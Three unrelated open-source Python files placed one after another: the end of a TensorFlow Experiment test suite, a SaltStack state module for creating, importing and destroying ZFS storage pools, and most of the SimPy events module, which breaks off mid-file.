(export_dir_base, export_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(1, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEquals(6, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.1)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_delay_secs=0,
continuous_eval_throttle_secs=0,
continuous_eval_predicate_fn=_predicate_fn)
ex.continuous_eval(evaluate_checkpoint_only_once=False)
self.assertEquals(3, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_run_local(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_and_evaluate(self):
est = TestEstimator()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input')
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, est.export_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEquals(1, count)
if __name__ == '__main__':
test.main()
| |
"""
States for managing zpools
:maintainer: Jorge Schrauwen <sjorge@blackdot.be>
:maturity: new
:depends: salt.utils.zfs, salt.modules.zpool
:platform: smartos, illumos, solaris, freebsd, linux
.. versionadded:: 2016.3.0
.. versionchanged:: 2018.3.1
Big refactor to remove duplicate code, better type conversions and improved
consistency in output.
.. code-block:: yaml
oldpool:
zpool.absent:
- export: true
newpool:
zpool.present:
- config:
import: false
force: true
- properties:
comment: salty storage pool
- layout:
- mirror:
- /dev/disk0
- /dev/disk1
- mirror:
- /dev/disk2
- /dev/disk3
partitionpool:
zpool.present:
- config:
import: false
force: true
- properties:
comment: disk partition salty storage pool
ashift: '12'
feature@lz4_compress: enabled
- filesystem_properties:
compression: lz4
atime: on
relatime: on
- layout:
- /dev/disk/by-uuid/3e43ce94-77af-4f52-a91b-6cdbb0b0f41b
simplepool:
zpool.present:
- config:
import: false
force: true
- properties:
comment: another salty storage pool
- layout:
- /dev/disk0
- /dev/disk1
.. warning::
The layout will never be updated, it will only be used at time of creation.
    It's a whole lot of work to figure out if a device needs to be detached, removed,
    etc. This is best done by the sysadmin on a case-by-case basis.
Filesystem properties are also not updated, this should be managed by the zfs state module.
"""
import logging
import os
from salt.utils.odict import OrderedDict
log = logging.getLogger(__name__)
# Define the state's virtual name
__virtualname__ = "zpool"
def __virtual__():
"""
Provides zpool state
"""
if not __grains__.get("zfs_support"):
return False, "The zpool state cannot be loaded: zfs not supported"
return __virtualname__
def _layout_to_vdev(layout, device_dir=None):
"""
    Turn the layout data into a usable vdev specification
We need to support 2 ways of passing the layout:
.. code::
layout_new:
- mirror:
- disk0
- disk1
- mirror:
- disk2
- disk3
    .. code::
layout_legacy:
mirror-0:
disk0
disk1
mirror-1:
disk2
disk3
"""
vdevs = []
# NOTE: check device_dir exists
if device_dir and not os.path.exists(device_dir):
device_dir = None
# NOTE: handle list of OrderedDicts (new layout)
if isinstance(layout, list):
# NOTE: parse each vdev as a tiny layout and just append
for vdev in layout:
if isinstance(vdev, OrderedDict):
vdevs.extend(_layout_to_vdev(vdev, device_dir))
else:
if device_dir and vdev[0] != "/":
vdev = os.path.join(device_dir, vdev)
vdevs.append(vdev)
# NOTE: handle nested OrderedDict (legacy layout)
# this is also used to parse the nested OrderedDicts
# from the new layout
elif isinstance(layout, OrderedDict):
for vdev in layout:
# NOTE: extract the vdev type and disks in the vdev
vdev_type = vdev.split("-")[0]
vdev_disk = layout[vdev]
# NOTE: skip appending the dummy type 'disk'
if vdev_type != "disk":
vdevs.append(vdev_type)
            # NOTE: ensure the disks are a list (legacy layouts are not)
if not isinstance(vdev_disk, list):
vdev_disk = vdev_disk.split(" ")
            # NOTE: also append the actual disks behind the type
# also prepend device_dir to disks if required
for disk in vdev_disk:
if device_dir and disk[0] != "/":
disk = os.path.join(device_dir, disk)
vdevs.append(disk)
# NOTE: we got invalid data for layout
else:
vdevs = None
return vdevs
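# Illustrative sketch (assumed input/output, matching the docstring above):
#
#   _layout_to_vdev([OrderedDict([('mirror', ['disk0', 'disk1'])]),
#                    OrderedDict([('mirror', ['disk2', 'disk3'])])])
#   # -> ['mirror', 'disk0', 'disk1', 'mirror', 'disk2', 'disk3']
#
# With device_dir='/dev/dsk' (and that directory present on the system), bare
# names would be prepended accordingly, e.g. '/dev/dsk/disk0'.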
def present(
name, properties=None, filesystem_properties=None, layout=None, config=None
):
"""
ensure storage pool is present on the system
name : string
name of storage pool
properties : dict
optional set of properties to set for the storage pool
filesystem_properties : dict
optional set of filesystem properties to set for the storage pool (creation only)
layout: dict
disk layout to use if the pool does not exist (creation only)
config : dict
fine grain control over this state
.. note::
The following configuration properties can be toggled in the config parameter.
- import (true) - try to import the pool before creating it if absent
- import_dirs (None) - specify additional locations to scan for devices on import (comma-separated)
        - device_dir (None, SunOS=/dev/dsk, Linux=/dev) - specify device directory to prepend for
          non-absolute device paths
- force (false) - try to force the import or creation
.. note::
        It is no longer needed to give a unique name to each top-level vdev; the old
        layout format is still supported but no longer recommended.
.. code-block:: yaml
- mirror:
- /tmp/vdisk3
- /tmp/vdisk2
- mirror:
- /tmp/vdisk0
- /tmp/vdisk1
The above yaml will always result in the following zpool create:
.. code-block:: bash
zpool create mypool mirror /tmp/vdisk3 /tmp/vdisk2 mirror /tmp/vdisk0 /tmp/vdisk1
.. warning::
        The legacy format is also still supported but not recommended;
        because IDs inside the layout dict must be unique, they need a suffix.
.. code-block:: yaml
mirror-0:
/tmp/vdisk3
/tmp/vdisk2
mirror-1:
/tmp/vdisk0
/tmp/vdisk1
.. warning::
Pay attention to the order of your dict!
.. code-block:: yaml
- mirror:
- /tmp/vdisk0
- /tmp/vdisk1
- /tmp/vdisk2
The above will result in the following zpool create:
.. code-block:: bash
zpool create mypool mirror /tmp/vdisk0 /tmp/vdisk1 /tmp/vdisk2
        This creates a 3-way mirror, while you probably expected a mirror
        root vdev with 2 devices plus a root vdev of 1 device!
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
# config defaults
default_config = {
"import": True,
"import_dirs": None,
"device_dir": None,
"force": False,
}
if __grains__["kernel"] == "SunOS":
default_config["device_dir"] = "/dev/dsk"
elif __grains__["kernel"] == "Linux":
default_config["device_dir"] = "/dev"
# merge state config
if config:
default_config.update(config)
config = default_config
# ensure properties are zfs values
if properties:
properties = __utils__["zfs.from_auto_dict"](properties)
elif properties is None:
properties = {}
if filesystem_properties:
filesystem_properties = __utils__["zfs.from_auto_dict"](filesystem_properties)
elif filesystem_properties is None:
filesystem_properties = {}
# parse layout
vdevs = _layout_to_vdev(layout, config["device_dir"])
if vdevs:
vdevs.insert(0, name)
# log configuration
log.debug("zpool.present::%s::config - %s", name, config)
log.debug("zpool.present::%s::vdevs - %s", name, vdevs)
log.debug("zpool.present::%s::properties - %s", name, properties)
log.debug(
"zpool.present::%s::filesystem_properties - %s", name, filesystem_properties
)
# ensure the pool is present
ret["result"] = False
# don't do anything because this is a test
if __opts__["test"]:
if __salt__["zpool.exists"](name):
ret["result"] = True
ret["comment"] = "storage pool {} is {}".format(name, "uptodate")
else:
ret["result"] = None
ret["changes"][name] = "imported" if config["import"] else "created"
ret["comment"] = "storage pool {} would have been {}".format(
name, ret["changes"][name]
)
# update pool
elif __salt__["zpool.exists"](name):
ret["result"] = True
# fetch current pool properties
properties_current = __salt__["zpool.get"](name, parsable=True)
# build list of properties to update
properties_update = []
if properties:
for prop in properties:
                # skip nonexistent properties
if prop not in properties_current:
log.warning(
"zpool.present::%s::update - unknown property: %s", name, prop
)
continue
# compare current and wanted value
if properties_current[prop] != properties[prop]:
properties_update.append(prop)
# update pool properties
for prop in properties_update:
res = __salt__["zpool.set"](name, prop, properties[prop])
if res["set"]:
if name not in ret["changes"]:
ret["changes"][name] = {}
ret["changes"][name][prop] = properties[prop]
else:
ret["result"] = False
if ret["comment"] == "":
ret["comment"] = "The following properties were not updated:"
ret["comment"] = "{} {}".format(ret["comment"], prop)
if ret["result"]:
ret["comment"] = (
"properties updated" if ret["changes"] else "no update needed"
)
# import or create the pool (at least try to anyway)
else:
# import pool
if config["import"]:
mod_res = __salt__["zpool.import"](
name,
force=config["force"],
dir=config["import_dirs"],
)
ret["result"] = mod_res["imported"]
if ret["result"]:
ret["changes"][name] = "imported"
ret["comment"] = "storage pool {} was imported".format(name)
# create pool
if not ret["result"] and vdevs:
log.debug("zpool.present::%s::creating", name)
# execute zpool.create
mod_res = __salt__["zpool.create"](
*vdevs,
force=config["force"],
properties=properties,
filesystem_properties=filesystem_properties
)
ret["result"] = mod_res["created"]
if ret["result"]:
ret["changes"][name] = "created"
ret["comment"] = "storage pool {} was created".format(name)
elif "error" in mod_res:
ret["comment"] = mod_res["error"]
else:
ret["comment"] = "could not create storage pool {}".format(name)
# give up, we cannot import the pool and we do not have a layout to create it
if not ret["result"] and not vdevs:
ret["comment"] = (
"storage pool {} was not imported, no (valid) layout specified for"
" creation".format(name)
)
return ret
def absent(name, export=False, force=False):
"""
ensure storage pool is absent on the system
name : string
name of storage pool
export : boolean
export instead of destroy the zpool if present
force : boolean
force destroy or export
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
# log configuration
log.debug("zpool.absent::%s::config::force = %s", name, force)
log.debug("zpool.absent::%s::config::export = %s", name, export)
# ensure the pool is absent
if __salt__["zpool.exists"](name): # looks like we need to do some work
mod_res = {}
ret["result"] = False
# NOTE: handle test
if __opts__["test"]:
ret["result"] = True
# NOTE: try to export the pool
elif export:
mod_res = __salt__["zpool.export"](name, force=force)
ret["result"] = mod_res["exported"]
# NOTE: try to destroy the pool
else:
mod_res = __salt__["zpool.destroy"](name, force=force)
ret["result"] = mod_res["destroyed"]
if ret["result"]: # update the changes and comment
ret["changes"][name] = "exported" if export else "destroyed"
ret["comment"] = "storage pool {} was {}".format(name, ret["changes"][name])
elif "error" in mod_res:
ret["comment"] = mod_res["error"]
else: # we are looking good
ret["result"] = True
ret["comment"] = "storage pool {} is absent".format(name)
return ret
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
| |
"""
This module contains the basic event types used in SimPy.
The base class for all events is :class:`Event`. Though it can be directly
used, there are several specialized subclasses of it.
.. autosummary::
~simpy.events.Event
~simpy.events.Timeout
~simpy.events.Process
~simpy.events.AnyOf
~simpy.events.AllOf
This module also defines the :exc:`Interrupt` exception.
"""
from simpy._compat import PY2
if PY2:
import sys
PENDING = object()
"""Unique object to identify pending values of events."""
URGENT = 0
"""Priority of interrupts and process initialization events."""
NORMAL = 1
"""Default priority used by events."""
class Event(object):
"""An event that may happen at some point in time.
An event
- may happen (:attr:`triggered` is ``False``),
- is going to happen (:attr:`triggered` is ``True``) or
- has happened (:attr:`processed` is ``True``).
Every event is bound to an environment *env* and is initially not
triggered. Events are scheduled for processing by the environment after
they are triggered by either :meth:`succeed`, :meth:`fail` or
:meth:`trigger`. These methods also set the *ok* flag and the *value* of
the event.
An event has a list of :attr:`callbacks`. A callback can be any callable.
Once an event gets processed, all callbacks will be invoked with the event
as the single argument. Callbacks can check if the event was successful by
examining *ok* and do further processing with the *value* it has produced.
Failed events are never silently ignored and will raise an exception upon
being processed. If a callback handles an exception, it must set :attr:`defused`
to ``True`` to prevent this.
This class also implements ``__and__()`` (``&``) and ``__or__()`` (``|``).
If you concatenate two events using one of these operators,
a :class:`Condition` event is generated that lets you wait for both or one
of them.
"""
def __init__(self, env):
self.env = env
"""The :class:`~simpy.core.Environment` the event lives in."""
self.callbacks = []
"""List of functions that are called when the event is processed."""
self._value = PENDING
def __repr__(self):
"""Return the description of the event (see :meth:`_desc`) with the id
of the event."""
return '<%s object at 0x%x>' % (self._desc(), id(self))
def _desc(self):
"""Return a string *Event()*."""
return '%s()' % self.__class__.__name__
@property
def triggered(self):
"""Becomes ``True`` if the event has been triggered and its callbacks
are about to be invoked."""
return self._value is not PENDING
@property
def processed(self):
"""Becomes ``True`` if the event has been processed (e.g., its
callbacks have been invoked)."""
return self.callbacks is None
@property
def ok(self):
"""Becomes ``True`` when the event has been triggered successfully.
A "successful" event is one triggered with :meth:`succeed()`.
:raises AttributeError: if accessed before the event is triggered.
"""
return self._ok
@property
def defused(self):
"""Becomes ``True`` when the failed event's exception is "defused".
When an event fails (i.e. with :meth:`fail()`), the failed event's
`value` is an exception that will be re-raised when the
:class:`~simpy.core.Environment` processes the event (i.e. in
:meth:`~simpy.core.Environment.step()`).
It is also possible for the failed event's exception to be defused by
setting :attr:`defused` to ``True`` from an event callback. Doing so
prevents the event's exception from being re-raised when the event is
processed by the :class:`~simpy.core.Environment`.
"""
return hasattr(self, '_defused')
@defused.setter
def defused(self, value):
self._defused = True
@property
def value(self):
"""The value of the event if it is available.
The value is available when the event has been triggered.
Raises :exc:`AttributeError` if the value is not yet available.
"""
if self._value is PENDING:
raise AttributeError('Value of %s is not yet available' % self)
return self._value
    def trigger(self, event):
        """Trigger the event with the state and value of the provided *event*.
        Return *self* (this event instance).
        This method can be used directly as a callback function to trigger
        chain reactions.
        """
        self._ok = event._ok
        self._value = event._value
        self.env.schedule(self)
        return self
def succeed(self, value=None):
"""Set the event's value, mark it as successful and schedule it for
processing by the environment. Returns the event instance.
        Raises :exc:`RuntimeError` if this event has already been triggered.
"""
if self._value is not PENDING:
raise RuntimeError('%s has already been triggered' % self)
self._ok = True
self._value = value
self.env.schedule(self)
return self
def fail(self, exception):
"""Set *exception* as the events value, mark it as failed and schedule
it for processing by the environment. Returns the event instance.
Raises :exc:`ValueError` if *exception* is not an :exc:`Exception`.
Raises :exc:`RuntimeError` if this event has already been triggered.
"""
if self._value is not PENDING:
raise RuntimeError('%s has already been triggered' % self)
if not isinstance(exception, BaseException):
raise ValueError('%s is not an exception.' % exception)
self._ok = False
self._value = exception
self.env.schedule(self)
return self
def __and__(self, other):
"""Return a :class:`~simpy.events.Condition` that will be triggered if
both, this event and *other*, have been processed."""
return Condition(self.env, Condition.all_events, [self, other])
def __or__(self, other):
"""Return a :class:`~simpy.events.Condition` that will be triggered if
either this event or *other* have been processed (or even both, if they
happened concurrently)."""
return Condition(self.env, Condition.any_events, [self, other])
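# Illustrative sketch (usage, not part of the original module): the operators
# defined above compose events into conditions.
#
#   import simpy
#   env = simpy.Environment()
#   both = env.timeout(1) & env.timeout(2)    # fires once both have fired
#   either = env.timeout(1) | env.timeout(2)  # fires once one has fired
#   env.run(until=both)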
class Timeout(Event):
"""A :class:`~simpy.events.Event` that gets triggered after a *delay* has
passed.
This event is automatically triggered when it is created.
"""
def __init__(self, env, delay, value=None):
if delay < 0:
raise ValueError('Negative delay %s' % delay)
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = env
self.callbacks = []
self._value = value
self._delay = delay
self._ok = True
env.schedule(self, NORMAL, delay)
def _desc(self):
"""Return a string *Timeout(delay[, value=value])*."""
return '%s(%s%s)' % (self.__class__.__name__, self._delay,
'' if self._value is None else
(', value=%s' % self._value))
class Initialize(Event):
"""Initializes a process. Only used internally by :class:`Process`.
This event is automatically triggered when it is created.
"""
def __init__(self, env, process):
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = env
self.callbacks = [process._resume]
self._value = None
# The initialization events needs to be scheduled as urgent so that it
# will be handled before interrupts. Otherwise a process whose
# generator has not yet been started could be interrupted.
self._ok = True
env.schedule(self, URGENT)
class Interruption(Event):
"""Immediately schedules an :class:`Interrupt` exception with the given
*cause* to be thrown into *process*.
This event is automatically triggered when it is created.
"""
def __init__(self, process, cause):
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = process.env
self.callbacks = [self._interrupt]
self._value = Interrupt(cause)
self._ok = False
self._defused = True
if process._value is not PENDING:
raise RuntimeError('%s has terminated and cannot be interrupted.' %
process)
if process is self.env.active_process:
raise RuntimeError('A process is not allowed to interrupt itself.')
self.process = process
self.env.schedule(self, URGENT)
def _interrupt(self, event):
# Ignore dead processes. Multiple concurrently scheduled interrupts
# cause this situation. If the process dies while handling the first
# one, the remaining interrupts must be ignored.
if self.process._value is not PENDING:
return
# A process never expects an interrupt and is always waiting for a
# target event. Remove the process from the callbacks of the target.
self.process._target.callbacks.remove(self.process._resume)
self.process._resume(self)
class Process(Event):
"""Process an event yielding generator.
A generator (also known as a coroutine) can suspend its execution by
yielding an event. ``Process`` will take care of resuming the generator
with the value of that event once it has happened. The exception of failed
events is thrown into the generator.
``Process`` itself is an event, too. It is triggered, once the generator
returns or raises an exception. The value of the process is the return
value of the generator or the exception, respectively.
.. note::
        Python versions prior to 3.3 do not support return statements in
        generators. You can use :meth:`~simpy.core.Environment.exit()` as
        a workaround.
Processes can be interrupted during their execution by :meth:`interrupt`.
"""
def __init__(self, env, generator):
if not hasattr(generator, 'throw'):
# Implementation note: Python implementations differ in the
# generator types they provide. Cython adds its own generator type
# in addition to the CPython type, which renders a type check
# impractical. To workaround this issue, we check for attribute
# name instead of type and optimistically assume that all objects
# with a ``throw`` attribute are generators (the more intuitive
# name ``__next__`` cannot be used because it was renamed from
# ``next`` in Python 2).
# Remove this workaround if it causes issues in production!
raise ValueError('%s is not a generator.' % generator)
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = env
self.callbacks = []
self._value = PENDING
self._generator = generator
# Schedule the start of the execution of the process.
self._target = Initialize(env, self)
def _desc(self):
"""Return a string *Process(process_func_name)*."""
return '%s(%s)' % (self.__class__.__name__, self._generator.__name__)
@property
def target(self):
"""The event that the process is currently waiting for.
Returns ``None`` if the process is dead or it is currently being
interrupted.
"""
return self._target
@property
def is_alive(self):
"""``True`` until the process generator exits."""
return self._value is PENDING
def interrupt(self, cause=None):
"""Interupt this process optionally providing a *cause*.
A process cannot be interrupted if it already terminated. A process can
also not interrupt itself. Raise a :exc:`RuntimeError` in these
cases.
"""
Interruption(self, cause)
def _resume(self, event):
"""Resumes the execution of the process with the value of *event*. If
the process generator exits, the process itself will get triggered with
the return value or the exception of the generator."""
# Mark the current process as active.
self.env._active_proc = self
while True:
# Get next event from process
try:
if event._ok:
event = self._generator.send(event._value)
else:
# The process has no choice but to handle the failed event
# (or fail itself).
event._defused = True
# Create an exclusive copy of the exception for this
# process to prevent traceback modifications by other
# processes.
exc = type(event._value)(*event._value.args)
exc.__cause__ = event._value
if PY2:
if hasattr(event._value, '__traceback__'):
exc.__traceback__ = event._value.__traceback__
event = self._generator.throw(exc)
except StopIteration as e:
# Process has terminated.
event = None
self._ok = True
self._value = e.args[0] if len(e.args) else None
self.env.schedule(self)
break
except BaseException as e:
# Process has failed.
event = None
self._ok = False
tb = e.__traceback__ if not PY2 else sys.exc_info()[2]
# Strip the frame of this function from the traceback as it
# does not add any useful information.
e.__traceback__ = tb.tb_next
self._value = e
self.env.schedule(self)
break
# Process returned another event to wait upon.
try:
# Be optimistic and blindly access the callbacks attribute.
if event.callbacks is not None:
# The event has not yet been triggered. Register callback
# to resume the process if that happens.
event.callbacks.append(self._resume)
break
except AttributeError:
# Our optimism didn't work out, figure out what went wrong and
# inform the user.
if not hasattr(event, 'callbacks'):
msg = 'Invalid yield value "%s"' % event
descr = _describe_frame(self._generator.gi_frame)
error = RuntimeError('\n%s%s' % (descr, msg))
# Drop the AttributeError as the cause for this exception.
error.__cause__ = None
raise error
self._target = event
self.env._active_proc = None
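# Illustrative sketch (usage, not part of the original module): interrupting
# a process from another process. Names (worker, canceller) are assumptions.
#
#   def worker(env):
#       try:
#           yield env.timeout(10)
#       except Interrupt as interrupt:
#           assert interrupt.cause == 'no need to wait'
#
#   def canceller(env, proc):
#       yield env.timeout(3)
#       proc.interrupt('no need to wait')
#
#   env = simpy.Environment()
#   proc = env.process(worker(env))
#   env.process(canceller(env, proc))
#   env.run()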
class ConditionValue(object):
"""Result of a :class:`~simpy.events.Condition`. It supports convenient
dict-like access to the triggered events and their values. The events are
    ordered by their occurrences in the condition."""
def __init__(self):
self.events = []
def __getitem__(self, key):
if key not in self.events:
raise KeyError(str(key))
return key._value
def __contains__(self, key):
return key in self.events
def __eq__(self, other):
if type(other) is ConditionValue:
return self.events == other.events
return self.todict() == other
def __repr__(self):
return '<ConditionValue %s>' % self.todict()
def __iter__(self):
return self.keys()
def keys(self):
return (event for event in self.events)
def values(self):
return (event._value for event in self.events)
def items(self):
return ((event, event._value) for event in self.events)
def todict(self):
return dict((event, event._value) for event in self.events)
class Condition(Event):
"""An event that gets triggered once the condition function *evaluate*
returns ``True`` on the given list of *events*.
The value of the condition event is an instance of :class:`ConditionValue`
which allows convenient access to the input events and their values. The
:class:`ConditionValue` will only contain entries for those events that
occurred before the condition is processed.
If one of the events fails, the condition also fails and forwards the
exception of the failing event.
The *evaluate* function receives the list of target events and the number
of processed events in this list: ``evaluate(events, processed_count)``. If
it returns ``True``, the condition is triggered. The
:func:`Condition.all_events()` and :func:`Condition.any_events()` functions
are used to implement *and* (``&``) and *or* (``|``) for events.
Condition events can be nested.
"""
def __init__(self, env, evaluate, events):
super(Condition, self).__init__(env)
self._evaluate = evaluate
self._events = events if type(events) is tuple else tuple(events)
self._count = 0
if not self._events:
# Immediately succeed if no events are provided.
self.succeed(ConditionValue())
return
# Check if events belong to the same environment.
for event in self._events:
if self.env != event.env:
raise ValueError('It is not allowed to mix events from '
'different environments')
# Check if the condition is met for each processed event. Attach
# _check() as a callback otherwise.
for event in self._events:
if event.callbacks is None:
self._check(event)
else:
event.callbacks.append(self._check)
# Register a callback which will build the value of this condition
# after it has been triggered.
self.callbacks.append(self._build_value)
def _desc(self):
"""Return a string *Condition(evaluate, [events])*."""
return '%s(%s, %s)' % (self.__class__.__name__,
self._evaluate.__name__, self._events)
def _populate_value(self, value):
"""Populate the *value* by recursively visiting all nested
conditions."""
for event in self._events:
if isinstance(event, Condition):
event._populate_value(value)
elif event.callbacks is None:
value.events.append(event)
def _build_value(self, event):
"""Build the value of this condition."""
self._remove_check_callbacks()
if event._ok:
self._value = ConditionValue()
self._populate_value(self._value)
def _remove_check_callbacks(self):
